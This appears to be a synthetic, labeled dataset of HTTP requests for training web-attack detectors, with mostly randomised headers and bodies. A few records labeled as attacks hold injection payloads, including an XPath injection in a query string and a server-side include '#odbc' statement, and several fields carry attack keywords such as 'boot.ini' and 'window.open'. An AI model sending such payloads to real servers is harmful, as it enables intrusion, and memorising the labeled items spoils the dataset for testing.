Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: min-fresh=359
Client-ip: 241.186.166.112
Cookie: hcghokoDb=cYhk0
Cookie2: $Version="894"
Date: Fri, 29 Jul 05 06:58:32 UTC
ETag: W/"LzPQHBHapwGvrrekc"
Expect: 100-continue
From: enona@meryupld.st
If-Modified-Since: Fri, 29 Feb 08 12:33:25 GMT
If-Unmodified-Since: Tue, 08 Nov 05 01:05:36 GMT
If-Match: "esB-ejEmcykgp.b_nLaw"
If-None-Match: "0IAqx5vw_96h6q2k"
If-Range: "QuK8@J2junAUBrZ"
Max-Forwards: 9
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic cm50Zzc6TmVtYVhsdEQ=
Authorization: Digest realm
Range: 0331-,4394-646932
Referer: http://www.gltim.com/ceayab71/ahdtidn.jsp
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/9.2 (compatible; MSIE 8.4; Mac OS X; ietThfen)
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 557x3497
Via: r9stie/4.0 www.otdee.js
Transfer-Encoding: deflate
Upgrade: neh6ae/0.8, ua61t/0.4, pduRa/4.8, slsp/5.5
Warning: 115 252.241.30.131:98284 "fahxv" "Sun, 11 Jul 04 18:03:29 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 982389544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8958
Start - Id: 13633
class: Valid
GET /adminij@fAYr-L/frxLirnT3s/j9Gp2fWJoJLp16i70ea/gtgazzdrpbudis/6w3yC86WhTvmZqfRT/t-H/elh2KEuJL_GyGy/pT-JO8aiXd/onsufsW/tiikeghdmeacdrasi.mdb?e1=mY2&Mxmocha1CBpM=peeqEanp&i6OJSae=ettnl&zm=%5BugSohokriao&bhW5cZPOhttpC=iframe+G&iYO365=6&h4xb2=sIDRbFtTLO HTTP/1.0
Host: 187.99.221.218
Connection: close
Accept: video/mpeg;q=0.9
Accept-Charset: gb2312;q=0.9, cp-936;q=0.6, x-mac-arabic, utf-7;q=0.7
Accept-Encoding: deflate;q=0.8, deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 63.99.161.90
Cookie: seaaa=rDunion;aeC=57;CpF6C=dE;XB_-Minsertzwindow.open1T=odn;urgoik=3e copy;yposition8y=nDkkx8cSg
Cookie2: $Version="8"
Date: Tue, 21 Oct 08 10:53:55 GMT
ETag: W/"I6@WKElRnWNH-Lf"
Expect: 100-continue
From: ednsif0g@o99ssn.be
If-Modified-Since: Sun, 22 Jun 08 15:39:46 GMT
If-Unmodified-Since: Fri, 26 Oct 07 22:46:38 GMT
If-Match: "eci1eut6UrBvMRtsc"
If-None-Match: "uGaZtvlJ46tGEqn-_m@"
If-Range: *
Max-Forwards: 166
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: Digest uri=/s9teva/oete.nsf
Range: 61-
Referer: /I0jyln/Afot/2jtxonom/diEuGy/LAannara.ace
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/6.3 (X11; U; Open BSD i386 8.6; oH-q9; rv:6.8.2) Gecko/71074666
UA-CPU: StrongARM
UA-Disp: 0811,7383,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1926x6601
Via: FTP/0.8 www.tstmooih.shtml
Transfer-Encoding: tdpEt
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 221.57.39.147
X-Serial-Number: 7185316182193788
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13633
Start - Id: 31602
class: Valid
GET /awBujzIk91AwM/un/f9eio8JIP7H5e6Jkt6g/HBe/MJhsTwFz3window.open6WX./4fn/oy24ell86jyoixg/roUXZhj80A-1/bfnyrhzN4/ep66/qYmZ_A95uAy/stwbpauSeaIa6erlgu.dll? HTTP/1.0
Host: 235.16.246.202
Connection: tstsdu
Accept: text/html;q=0.5, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 160.28.85.154
Cookie: a6t=sxoh)oet;al9ysnbm=anfnHbr;dXPiEhuz5m=viatMroh1icatlH
Cookie2: $Version="8"
Date: Sat, 02 Dec 06 02:17:09 UTC
ETag: "yVNzbJcnpSbQm-OQ"
Expect: rilae=lcgiue
From: Seenwnj@easRlfj.biz
If-Modified-Since: Wed, 15 Oct 08 21:53:20 GMT
If-Unmodified-Since: Tue, 21 Nov 06 02:01:58 GMT
If-Match: *
If-None-Match: "gr_08SnGradVi79"
If-Range: "KYmdeCmJfgR1sE6"
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="FD8ADbEE2Add907cB1Da0CFF05F24cbe"
Authorization: Basic YXJoZ2Y6azV2dA==
Range: -96734,-3593,7159-
Referer: http://www.scvi.it/pgwaa/ln3oroi/t4motcr/eiyti.pdf
TE: deflate,trailers
Trailer: Upgrade
User-Agent: nrirrtkshEaV
UA-CPU: PowerPC
UA-Disp: 857,7846,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3066x402
Via: 6.7 197.164.198.113, 7.3 20.107.19.245
Transfer-Encoding: identity
Upgrade: dmyle/0.4, eeo/3.5
Warning: 137 244.132.47.139 "naatanasiuutzeseht" "Tue, 25 Mar 08 09:31:18 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 326800001017
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31602
Start - Id: 1955
class: Valid
GET /eelhmilwus/enaE8yiDpfm/lBa73hVkx@OUTny@fFT/sy0thheycwlsbf9Ianit/releqanYihhbaAetyoyl.nsf?rwocn=gaa2&JH1HemetaX=32016997&s6Gaprond16rn=m+aMeyo%3Eatyoi&onet=0&Athta7lhqo=uz&2R2B@HDXdW=See&iaeeh=053&Cmu=005&teahnhTRArkOot=543297186&DQ6T=7554309 HTTP/1.1
Host: www.yhegcAcs.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress
Accept-Language: wTgRti-tI1dne, 3qst-tegcl;q=0.5, ice1-aekoy, oHgw-awantd
Cache-Control: only-if-cached
Client-ip: 93.59.198.99
Cookie: tia=hep;heAmd=passthrundoiemk0cgo6iyee;POlzcoeaoauI=?s;m6U9_f@I=hsrarfzss1
Cookie2: $Version="909"
Date: Sun, 20 Jun 04 14:19:33 CET
ETag: "5IM0a8wAua3B.5K8dP"
Expect: 100-continue
From: ebeitt4@hsle.fr
If-Modified-Since: Wed, 06 Apr 05 02:10:39 GMT
If-Unmodified-Since: Tue, 01 Nov 05 08:56:29 GMT
If-Match: "TE6cKGkRIuc-27@th7"
If-None-Match: ".CO8ww140kp31HkxkS"
If-Range: Sat, 28 Jul 07 09:48:35 UTC
Max-Forwards: 8
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM SXlhc2JzZG1vbjI5ajJqVGZpRHRzdGl0ZHVhZXl1ZXI=
Range: 0-,-750641
Referer: http://7br9.it/ktT8nyi/s8aao.pdf
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.3 (compatible; Konqueror/9.3; Open BSD i586; wsrendf4; yfRd)
UA-CPU: Sparc
UA-Disp: 702,657,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: 3.1 www.etne.jpeg:8
Transfer-Encoding: gzip
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 631 229.150.100.176 "toaero" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1955
Start - Id: 17169
class: Valid
GET /hy3frtvrpk7eoes/to0ivetjs/xBmZd994gjT.htm? HTTP/1.1
Host: www.etiliyte.com
Connection: keep-alive
Accept: video/*
Accept-Charset: shift_jis, x-mac-arabic;q=0.4, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 127.44.49.75
Cookie: oeroagTdirieti=ee ecU0idXcjc&;tob5=rlhhclmjdnph6;othteAg2j1a8em=eroAmxpare31i1le;trruOhoINto= re;& yor6Slpcr/
Cookie2: $Version="8"
Date: Tue, 12 Sep 06 02:07:56 GMT
ETag: W/"fC2iwVqebiOk3RGH"
Expect: t0yt
From: efabt@teina.org
If-Modified-Since: Sun, 01 Jul 07 18:25:12 UTC
If-Unmodified-Since: Fri, 08 Feb 08 07:17:27 CET
If-Match: *
If-None-Match: "6FUNH4v7AJgtkIM"
If-Range: "a9tfhDyuuR5@WfblII"
Max-Forwards: 668
MIME-Version: 3.2
Pragma: f0ghbeEi='hic9eaee'
Proxy-Authorization: Basic RW9keVA6c29waXNoZWI=
Authorization: iis40p ltrk2=itoiems
Range: -785968,-02
Referer: http://www.liYw.cz/olsho/rntnit/8mI1Iuh/Asrmr/omtnesm.exe
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/8.8 (X11; U; Solaris 6.4; oi-ga; rv:7.7.9) Gecko/27949128
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: FTP/8.7 www.hSrnZnri.jpeg:22
Transfer-Encoding: identity
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17169
Start - Id: 13330
class: Valid
GET /eAlb87iw_oFQho/663rrgoyrlrt2demA/SJYfXBL3q4/tMG/sAgETc-AwK5HzAtsPR17/nA2b/ryncodnnnetnoLrtnt/0ua1e/ehnHzIhAdXwuIuLUQwg/ATdasjfds/8oQvQ@PjdYF1ED.cfm?isie1eb6ieraots=699773&ixOnhM=frabj&6si76ctnh=+gioptdocumentstvghboot.ini&E4Eq8O@T=hitSn&oo=T5dmlkl-oe&jrpF0lautsttz=c8syy&qess=gWPffuT&srsYm5srjaleomh=22968506&eheesadOd=awgkf%409PQ7&dn=jqjq3vK&nYenrsDeeSwn=8d&mgroup by-pQ7=8599&rcwsoscPnenm6Sk=7776 HTTP/1.1
Host: www.fvSonole.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=2
Client-ip: 49.183.209.209
Cookie: 9unHpzFM4=29;YkExPaD=eiYaeto;sqohemaU=2300
Cookie2: $Version="974"
Date: Sat, 05 Jun 04 24:11:24 CET
ETag: W/"pK5DcAyL1xkVaZ-c"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Thu, 09 Feb 06 18:39:15 UTC
If-Unmodified-Since: Fri, 01 Jun 07 22:43:59 CET
If-Match: "r_179SCMdDXz41Plz3Zl"
If-None-Match: *
If-Range: Sun, 26 Oct 08 01:16:45 GMT
Max-Forwards: 3
MIME-Version: 5.1
Pragma: xee='nznIgnfh'
Proxy-Authorization: NTLM dG5vWXU2bzVvMm5hdGFoYjFvTGF6aXJhZ3NuYW5VZW9wdGU3
Authorization: NTLM YWFvYWl0ZHJleXNuVEg3bHNVMHNlZWRueGFlRWVSbkJsZmlhb29jZWlpdVM=
Range: 570684-4,-894117
Referer: http://www.reasn.gov/tacR07oh/logura/r8umwf/oalll.zip
TE: trailers,chunked,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (X11; U; Open BSD i586 4.2; ls-3o; rv:4.0.0) Gecko/50366129
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 643x366
Via: 2.6 www.etatwui.css, rae/8.2 www.sl80oir.jpeg
Transfer-Encoding: deflate
Upgrade: arbqe/0.4, stO/8.7, nMx/4.4, ioMi4D/1.1, oChir/3.9
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 86.238.108.143
X-Serial-Number: 52905795752439402910
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13330
Start - Id: 49712
class: XPathInjection
GET /m3eeinDattfs.nsf?Aescript-MMs6p.=%3Btrall4&zabtiiscufoioc=855740&etm0l7=trwti4%2FEijhrr%2Flh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D339%5D+or+%27eomz9d%27+++%3D+++%27 HTTP/1.1
Host: www.ehreEc.org
Connection: close
Accept: video/*;q=0.1
Accept-Charset: koi8;q=0.0, windows-1251, macintosh;q=0.9, x-mac-ce;q=0.3
Accept-Encoding: compress;q=0.5, gzip;q=0.2
Accept-Language: anoi-kmH0, aa-hy, nusEs-Tal8;q=0.5, nou2ant-pdekhpac;q=0.2, oaa-iatoL;q=0.1
Cache-Control: max-age=82377
Client-ip: 108.36.71.41
Cookie: hRlriee=nm ;hnerbts=q&fY:eandecr?64;7oneptdEknh=04;05szepge=dswch1gU;NFYUotY5W=9
Cookie2: $Version="8"
Date: Sun, 20 Jun 04 06:45:11 GMT
ETag: "Wr3JumTJ7YREeQfjIy-"
Expect: eTteO
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: "LDRsLASJMFBQmg9d9rcb"
If-None-Match: *
If-Range: Wed, 16 Jan 08 05:04:33 CET
Max-Forwards: 9
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: e1tls Ridd=naieme
Authorization: Digest nonce
Range: 0-,006-0351
Referer: http://sacOzear.com/e3sh/hcrm/altp.php3
TE: gzip;q=0.4,chunked,gzip
Trailer: If-Modified-Since
User-Agent: ehvfRaQ7 http://www.eTCoee.it
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: Uao3rt/9.1 www.amaaniaa.css, dti44/2.6 www.ktdzY.jpeg:7139
Transfer-Encoding: gzip
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49712
Start - Id: 9264
class: Valid
GET /ieeNc.pl?ms=ar%3E&qyert=9N3LRJg&aasaiv847grm=eselle4en+ute+ee%3D&Fgbibe2d3uaoe6a=swO27EhL8p&dneEjeKc6oipea=inph-06ywwgett&D14LWZV7Ph=m+q+lqppouesTkn&W00OCnZG=txfG6fhVcg&j1mrrcilhhNila=stityal HTTP/1.1
Host: www.saKw.de
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 126.233.178.83
Cookie: hkd7atid=ny2Maasmett;syed=U;-;itSoceht=0;ngohein=r2UsS;tytlbc5nlfgnbeV=lqm0ierhaHodt;haq0nhtaEurnad=3a@window.open
Cookie2: $Version="49"
Date: Wed, 03 May 06 11:15:49 CET
ETag: W/"W5s9es_Mp56sfl0"
Expect: 100-continue
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 21 Jan 05 09:57:03 UTC
If-Unmodified-Since: Fri, 17 Oct 08 12:20:54 CET
If-Match: *
If-None-Match: "@bh0vsaN33Hg@HklFWxK"
If-Range: Thu, 06 Aug 09 04:21:37 CET
Max-Forwards: 03
MIME-Version: 4.6
Pragma: y=ook
Proxy-Authorization: NTLM ZWdkc2hvVGhIc0U4ZWhhYWNlc2VhZWJsbkF0c25vaG91
Authorization: neofc er5enlra=tieenou
Range: 30-703,-64,-521
Referer: http://xieee.fr/hmhrw/uOunip.jsp
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: 1etbyufsnsts3N5ie
UA-CPU: 68000
UA-Disp: 2373,285,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 476x394
Via: FTP/2.3 www.eeh0ptia.gif:9, HTTP/4.7 118.57.133.179
Transfer-Encoding: identity
Upgrade: 7sah/3.5
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 378312956268
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9264
Start - Id: 6664
class: Valid
PUT /rkysInJTByKuZcNI-e1.png? HTTP/1.0
Content-Length: 141
Content-Language: teamDt,o,hhsoa
Content-Encoding: gzip
Content-Location: http://www.nhvh.net/bhrstre.jsp
Content-MD5: aWlhdGVzWWxocGV3dGRsNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Aug 05 19:57:22 GMT
Last-Modified: Mon, 18 May 09 02:56:54 GMT
Host: www.noicoiib.st
Connection: inCSz
Accept: image/png;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: I-es;q=0.3, Xrb2-sss2dwhr, g3DTR-yo
Cache-Control: max-stale=79595
Client-ip: 217.190.201.170
Cookie: set8li=)itdlike8nlw
Cookie2: $Version="309"
Date: Wed, 06 Feb 08 21:33:13 CET
ETag: W/"GiFF6WrXaJpeCNcNY"
Expect: igE6tr
From: kmoes@oyExaqk5j.ch
If-Modified-Since: Wed, 23 Aug 06 01:26:38 GMT
If-Unmodified-Since: Mon, 14 Sep 09 06:54:20 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Oct 04 20:41:23 GMT
Max-Forwards: 123
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Basic Y293czpyZWxlZXk=
Range: -021340,1293-,80-
Referer: /Ytldnnm/Irdreef/wceas.pl
TE: chunked,deflate,chunked
Trailer: Accept-Language
User-Agent: i9ysrj8 http://www.tOted.uk
UA-CPU: Sparc
UA-Disp: 7591,1766,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: 8.5 www.t80rtalr.js
Transfer-Encoding: identity
Upgrade: v8fo/4.9, nudRl/5.8
Warning: 699 www.rweft.png "oofela76hoReehlisnaw" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

FaldieaSuaRRe2=fobjectT'9ireld>tc~k@&bntstut=Bh$3o1aei03tuxr&rcXy6teyGeeMrd=9LTc8@ulDzJ&cwm5uew=:uB&cnRveehtcrt=aeuc7ofhfctqgnr

End - Id: 6664
Start - Id: 5619
class: Valid
POST /6cJZJy/nnhf/mEdX6efM-PmImfi-Kf/raTik0op1/cE_/t_b1SXI2E_DNypOg-vCR/sHPmhdsuz9/bGplbu@px1ZNmiLm-/s9RMoa.NfCMtcAuNQgUB/Lhtpass.html? HTTP/1.0
Content-Length: 178
Content-Language: ttneqnle,p1n,rqrm
Content-Encoding: identity
Content-Location: http://nlgUeGt.gov/Y1ewisns/negc/r1aah/sw0tftxf/iuniweca.exe
Content-MD5: c3NsTmx1bGRidGVpaGVqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 11:05:57 GMT
Last-Modified: Wed, 02 Jun 04 10:04:02 CET
Host: www.aa3etal62i.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.1, x-mac-korean;q=0.0
Accept-Encoding: compress;q=0.5, deflate, gzip;q=0.6
Accept-Language: lqu-nmcrhria, rthyer-9cAo;q=0.3, ISkdq7na-03;q=0.8, ds-Tm;q=0.4
Cache-Control: max-stale
Client-ip: 101.218.67.81
Cookie: emws=[stdinpjjesecbshi@qqS;ea=i0a0hs;eie6drzjz=0700;Ta9raehedmjt=1
Cookie2: $Version="74"
Date: Sun, 30 Jan 05 19:15:20 CET
ETag: "bcRo.rDFW3u19MgT"
Expect: idqica2
From: frbac@ngi0nanafk.biz
If-Modified-Since: Tue, 20 Feb 07 24:54:43 CET
If-Unmodified-Since: Sat, 19 Feb 05 13:50:15 GMT
If-Match: "AmFCQ_9DMi07m1-4"
If-None-Match: *
If-Range: "NnNUtDBZXd-7lZ3u8Y"
Max-Forwards: 18
MIME-Version: 9.8
Pragma: o=eu8en0d
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Basic dG50bjphekRRYXJ0
Range: 67795-,06619-,662301-47622
Referer: http://et1y.st/erg0s/lsnrer3t/myieh/Nwgtph67/epioi.pl
TE: gzip
Trailer: If-Modified-Since
User-Agent: eeN6dpeexoik9Nyvb
UA-CPU: PowerPC
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0202x3743
Via: 9.3 124.207.111.107, FTP/4.6 www.2reiih.gif, 1.7 www.ndohmdpw.js
Transfer-Encoding: gzip
Upgrade: itsx/1.1, sjNs/5.5, rsIR/6.3, teTe/2.5
Warning: 803 145.78.232.247 "ihmqhTtecao" "Wed, 20 Aug 08 01:29:34 GMT"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eOnlias7ed=03098376&aanar=rerrMt3nwnove&Emnyobe2nwduutN=alaam&ZxaxR=eftp9rTie|  d&a=OM&ni=6017796&ideestnksgh2tsd=nehFtea hm&aue=eafrom%$iOltbI&oboot.iniuW2_60=47239290

End - Id: 5619
Start - Id: 40774
class: SSI
PUT /rfaVJUZ_pYFnPNfffvpi/qoFiDvsmel02eydt/otV.WTistah/be20UJ7@xPZ0uW/l61_/sX1-/0t/9usD3s/aAFPTramWgkHSn/stw/tsrtrrw5xEMri/dT96tcH9ngpPD2.mdb? HTTP/1.1
Content-Length: 117
Content-Language: Aef,rnin,r
Content-Encoding: compress
Content-Location: http://dSads.st/Ett0NhE.txt
Content-MD5: MnVlcmZua29WaXRyZWdhYg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 26 May 08 23:01:19 GMT
Host: 230.253.119.234
Connection: keep-alive
Accept: */*;q=0.8
Accept-Encoding: gzip;q=0.9, deflate;q=0.1, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=524
ETag: "_4SMIhw0@m0IpS4g"
If-Modified-Since: Thu, 01 Mar 07 08:47:18 CET
If-Match: *
If-None-Match: "VZjP0kVMXrFcuvmGWw"
If-Range: "0odu.aSvCrsnykOWosZ"
Max-Forwards: 2029
Pragma: no-cache
Proxy-Authorization: 8npmu Fmr9=ntsj
Referer: http://www.oldts.uk/urtbrs7.exe
User-Agent: dolchytsI/5.9.0.0
Transfer-Encoding: dAaw; ea9ki0=uwehuxj

tlcruvr=<!--   #odbc     connect="ttaq,ch,atsv"     statement="select   *     from  shywn"-->

End - Id: 40774
Start - Id: 25619
class: Valid
GET /nzsi/uvxao88gH/euQN8NSHvobl.x/LechojVNsGb3vc/wid9osietto/teD5PO1.php3?tsu=e28&etoaqoecamrr=r._AmcsBP04&htacces9locationstdinuuZ-Nreplace=3117&oe=39865009&6rlnniwjlrlai=eTrvzPAn&rirhratd=0882525167&vlaeafun=hiziefeu&motsybggmtye=Mrnascat0dEniM%26eee&gdotzpz4m2iI=feZvf_YgrVr_&pfe=82672995&autoexecKcecho=Ihcd&Cie=egbattwspR&iedf=httpsrrce%3At+e%25rlink&tnadi=umrguhshutdowne HTTP/1.0
Host: www.mnodNpsqNs.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-roman;q=0.2, iso-8859-8, windows-1251;q=0.4, windows-1252;q=0.1
Accept-Encoding: compress;q=0.9, deflate, compress
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Wed, 28 Feb 07 24:07:17 UTC
ETag: "isVzC5eWSe14nABtI1S"
Expect: 100-continue
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Sat, 10 Apr 04 07:58:42 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: "zTYKTPttHO@V0Pepk"
Max-Forwards: 2451
MIME-Version: 6.8
Pragma: iroooet=sluiri
Proxy-Authorization: Digest nonce
Authorization: NTLM ZWVyZm5saWVoaW9qb2FpZWhTbnNwcHlaaGROcnJ0ZXFvbXRubkVsenRNcXNlcw==
Range: -1684
Referer: /8ethtsoe.jpeg
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (compatible; omsahH; Solaris; i2qHrsgbao)
UA-CPU: 68000
UA-Disp: 8439,526,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1157x6904
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: deflate
Upgrade: j2sy/1.0, eHioTt/6.1, ellr/5.1, dd6/7.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 400505966006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25619
Start - Id: 594
class: Valid
GET /oltn94ang5hrmpan/c3Yr0WqqgN4aMNsHX3Rv/ied6ifRnto/rYhZL/7nREv5F5Y@WGjt/5dxmleE.jpg?4cyO=lehhaptgdom&bnt=ocJa0&K.o2HGiP=6tBtaj&sNeeetxnyc0ehm=8&oesenaor6t=a-&s01ief=fleyiynn7t8gsSna&d1pbarT=logh%24&sNkgT3nodTn=3351111 HTTP/1.1
Host: www.aiefRgw.com
Connection: jeuey
Accept: video/*, audio/*;q=0.5
Accept-Charset: windows-1255, x-mac-greek, x-mac-roman;q=0.6, windows-874;q=0.5, x-mac-japanese
Accept-Encoding: compress;q=0.8, gzip;q=0.1, compress;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 36.96.211.242
Cookie: eebinnr=9tnewdssezrenfesSe;leJsoHaos=stredeolm
Cookie2: $Version="482"
Date: Thu, 10 May 07 12:58:54 GMT
ETag: "mpak1MNfePXIbOgS"
Expect: tiAta
From: i7wh@s1dUih1sA.it
If-Modified-Since: Wed, 27 Apr 05 05:20:04 GMT
If-Unmodified-Since: Fri, 24 Sep 04 18:36:36 UTC
If-Match: "ZgkshK0tXrohX-1fv1i"
If-None-Match: *
If-Range: *
Max-Forwards: 2959
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM aWVlZW9kdHVhbUFnaTdtZGVzZU5yZ2dRMW51bHdhV2Nlbm1yYw==
Authorization: Digest qop=auth
Range: 00-
Referer: /a9aee4a/azcefw.php
TE: deflate;q=0.9,trailers
Trailer: Warning
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 6.9; aa-wu; rv:6.2.4) Gecko/03209148
UA-CPU: Sparc
UA-Disp: 8563,166,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 412x961
Via: monl/5.4 www.meitnaa.css, eh8s/4.6 www.whioo.tiff:56512
Transfer-Encoding: snar
Upgrade: thc/6.8
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 119.10.246.153
X-Serial-Number: 812808464
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 594
Start - Id: 8992
class: Valid
GET /uateEfs4reeyiets.php?OitEcrioebtyd=134049&alseneawhfyu=rmR82UBfR&hmrra8neid=8501091&gnlINKf5M9LC=7060374&dcpteti2cwmg=E+n&dNrnnh=Tbe%5C+%29&4ebnxnTeVXrid1=294564&heiZa=boot.iniperlw+&7uO=i%27to20bn&msu=1432948&gElgufmjucR5=VsKmraEehe&Lz4YTk-4Nk=nxey5t HTTP/1.1
Host: 176.161.172.72
Connection: close
Accept: text/html, audio/basic, audio/*
Accept-Charset: x-mac-greek;q=0.0, iso-8859-4, hz-gb-2312;q=0.4, x-mac-hebrew
Accept-Encoding: *
Accept-Language: g5flne-Mefahcx, ca8igLoe-2s
Cache-Control: only-if-cached
Client-ip: 89.96.201.213
Cookie: ilt=nllirfjjiide;breea=tv7Qq_;3R%utz_RlJns=qaoe%5De0ecdw%25doeem%26hE
Cookie2: $Version="7"
Date: Fri, 02 Dec 05 15:29:28 CET
ETag: W/"tITEZe2a@b90OdzSpI@"
Expect: 100-continue
From: lstucdNi@eei2smta.net
If-Modified-Since: Sat, 29 Jul 06 02:30:51 CET
If-Unmodified-Since: Tue, 28 Aug 07 09:24:06 GMT
If-Match: "IV_kibURjsTG7_ndIA"
If-None-Match: *
If-Range: Thu, 08 Jun 06 07:44:23 UTC
Max-Forwards: 2892
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: NTLM bmlyc0FyOGVrdHJvZWF0aXM2Y2VoZTA5ZXJlc3dibjc=
Range: -3579
Referer: /sdnn/uiiie/tmdtteam/dtot.asmx
TE: trailers
Trailer: Trailer
